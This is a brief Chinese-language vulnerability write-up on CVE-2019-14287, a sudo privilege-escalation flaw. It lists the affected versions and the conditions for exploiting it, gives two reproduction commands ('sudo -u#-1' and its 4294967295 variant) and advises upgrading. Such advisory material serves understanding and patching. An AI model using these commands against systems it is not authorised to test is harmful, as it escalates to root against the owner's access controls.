前言
sudo 是所有 unix操作系統(BSD, MacOS, GNU/Linux) 基本集成的一個用戶權限控制/切換程序。允許管理員控制服務器下用戶能夠切換的用戶權限
CVE-2019-14287 是管理員在配置文件中用了 ALL 關鍵詞後造成的。
影響版本
sudo < 1.8.28
利用條件
1、sudo -v < 1.8.28
2、知道當前用戶的密碼
3、當前用戶存在於sudo權限列表
我們來看一下/etc/sudoers
漏洞復現
sudo -u#-1 id -u
or
sudo -u#4294967295 id -u
修復建議
升級sudo到最新版